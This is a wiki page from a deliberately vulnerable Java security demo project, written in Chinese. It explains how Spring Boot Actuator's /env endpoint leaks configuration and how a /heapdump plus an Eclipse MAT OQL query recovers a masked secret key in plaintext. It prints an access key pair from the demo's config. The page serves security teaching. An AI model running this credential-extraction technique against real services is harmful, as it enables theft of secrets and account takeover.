-
Notifications
You must be signed in to change notification settings - Fork 689
Actuator Information Leakage
JoyChou edited this page Apr 25, 2023
·
2 revisions
Spring版本为1.5.1,在application.properties配置文件里配置了AKSK,再通过Actuator的env接口暴露,由于带有secret字符串,Actuator默认会将其打码。Spring版本是1.x的接口为/env。
/env的application.properties泄露信息:
applicationConfig: [classpath:/application.properties]: {
joychou.security.csrf.method: "POST",
joychou.business.callback: "callback_",
joychou.security.referer.uri: "/jsonp/**",
spring.datasource.url: "jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC",
joychou.security.csrf.enabled: "false",
joychou.security.referer.enabled: "false",
spring.datasource.password: "******",
spring.datasource.driver-class-name: "com.mysql.cj.jdbc.Driver",
management.security.enabled: "false",
endpoints.enabled: "true",
joychou.security.jsonp.referer.check.enabled: "true",
swagger.enable: "true",
spring.datasource.username: "root",
mybatis.mapper-locations: "classpath:mapper/*.xml",
joychou.security.csrf.exclude.url: "/xxe/**, /fastjson/**, /xstream/**, /ssrf/**, /deserialize/**",
joychou.security.jsonp.callback: "callback, _callback",
jsc.accessKey.id: "LTAI5tSAEPX3Z5N2Yt8ogc2y",
joychou.security.referer.host: "joychou.org, joychou.com",
jsc.accessKey.secret: "******",
joychou.no.need.login.url: "/css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**",
logging.level.org.joychou.mapper: "debug"
}
实际的application.properties配置:
jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
Actuator除了secret会打码,还有以下字符,相关代码在org/springframework/boot/actuate/endpoint/Sanitizer.java:
Sanitizer() {
this("password", "secret", "key", "token", ".*credentials.*", "vcap_services");
}通过/env接口获取到了明文的AK和打码后的SK,想办法如何获取明文的SK。通过/heapdump获取堆栈信息,并通过Eclipse的MAT工具获取明文SK,由于最终的secret是存在一个String字符串里,String字符串的key和value在Spring 1.x里存于 java.util.Hashtable$Entry。所以通过MAT的OQL功能(类似SQL)直接查询:
select * from java.util.Hashtable$Entry x WHERE toString(x.key).contains("jsc.accessKey")| - | Spring1.x | Spring2.x |
|---|---|---|
| 信息泄露路由 | /env | /actuator/env |
| 堆栈路由 | /heapdump | /actuator/heapdump |
| OQL | java.util.Hashtable$Entry | java.util.LinkedHashMap$Entry |